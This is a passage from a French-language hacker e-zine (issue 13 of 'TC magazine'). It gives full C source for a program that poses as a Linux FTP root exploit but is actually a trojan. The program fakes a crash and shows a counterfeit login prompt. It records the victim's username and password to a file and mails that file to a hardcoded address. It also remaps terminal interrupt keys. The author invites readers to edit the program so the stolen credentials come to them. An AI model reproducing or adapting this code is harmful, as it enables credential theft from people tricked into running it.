Just look ceci est un FAUX exploit et si vous le runner sur votre
machine, il va me e-mailer la passwd file... super cool.
Prenez ce programme C et modifier le pour que la passwd file soit e-mail
directement a vous.
Voici en exemple le prog. qui me emailerais la passwd file
moi !!!!
---------Cut hErE--------------------
/* FTP hole bug [05/01/98]
* Affected Operating Systems: ALL LINUX
* Exploitation Result: USers get root suid big on login rhost
*
* Syntax:
* user~$ cc -o suid19 suid19.c
* user~$ ./suid19
*
* it will then test and core dump an rhost file on your home dir with a suid bit
* then it'll bring you to a login screen and you login as normal and then
* using the rhost file with a suid bit you have a root shell
*
* www:~$ id
* root
*
* pheer!!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>
typedef struct
{
char id[9];
char password[9];
} login;
login loginfake;
void scanend(char *string);
void testX();
void pimpthem();
void fakelogin();
void sttystuff();
void emailus();
void main()
{
printf("Searching for local ftpd bugs.\n");
testX();
pimpthem();
sttystuff();
fakelogin();
emailus();
}
void scanend(char *string)
{
int count;
for(count=0;count<78;count++)
{
if(string[count]==10) string[count]=0;
if(string[count]==13) string[count]=0;
}
}
void testX()
{
char xterm[] = "xterm";
char xtermcolor[] = "xterm-color";
char rxvt[] = "rxvt";
char rxvtcolor[] = "rxvt-color";
char nxterm[] = "nxterm";
char noX[] = "You are in X, please exit to run this program";
if(! (strcmp(getenv("TERM"), xterm)))
{
printf("%c\n",noX);
exit(-1);
}
if( (!strcmp(getenv("TERM"), xtermcolor)))
{
printf("%c\n",noX);
exit(-1);
}
if(! (strcmp(getenv("TERM"), rxvt)))
{
printf("%c\n",noX);
exit(-1);
}
if(!(strcmp(getenv("TERM"),rxvtcolor)))
{
printf("%c\n",noX);
exit(-1);
}
if(!(strcmp(getenv("TERM"),nxterm)))
{
printf("%c\n",noX);
exit(-1);
}
}
void pimpthem()
{
printf("\n");
printf(".\n");
sleep( 1 );
printf(".\n");
sleep( 1 );
printf(".\n");
sleep( 1 );
printf("found buffer overide bug iSegmentation Fault (core dumped)\n");
sleep( 1 );
system("clear");
}
void fakelogin()
{
char *input1[10]={0};
char input[10];
char var[80] = {0};
char buffer[80] = {0};
FILE *fp;
FILE *file;
char hostname[80]={0};
FILE *hostnamefile;
fp = popen("cat /etc/issue.net", "r");
fread(var, 80, 1, fp);
printf("\n");
printf("%s",var);
printf("\n");
hostnamefile=fopen("/etc/HOSTNAME","r");
fread(hostname,78,1,hostnamefile);
scanend(hostname);
printf("%s login: ",hostname);
gets(input);
*input1=getpass("Password: ");
printf("\n");
printf("/bin/cat cannot open /etc/motd cought buffer overide!\n");
printf("opening system fix shell, run fsck\n");
strcpy(loginfake.id, input);
strcpy(loginfake.password, *input1);
file = fopen("mirror.txt","w");
fprintf(file, "username:%s\npassword:%s\nUID:%i",loginfake.id, loginfake.password, getuid());
fclose(file);
}
void emailus()
{
char guilly[] = "err418@technologist.com";
char thegza[] = "err418@technologist.com";
char *foo;
char *poo;
foo=(char *)malloc(4096);
sprintf(foo, "mail %s < mirror.txt",guilly);
poo=(char *)malloc(4096);
sprintf(poo, "mail %s < mirror.txt",thegza);
system(foo);
system(poo);
}
void sttystuff()
{
system("stty susp ^G");
system("stty intr ^Q");
}
---------Cut hErE--------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
0=----------=0
| Conclusion |
0=----------=0
Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Ok ! Voici ce qui close ce numro 13 de TC magazine.. j'espre que
vous en avez appris...
On se revoie le 13 juin prochain... see ya !
(-=-=-=-=-=-=-=-=-=-=-=-=-=-=Fin de la transmission-=-=-=-=-=-=-=-=-=-=-=-=-=)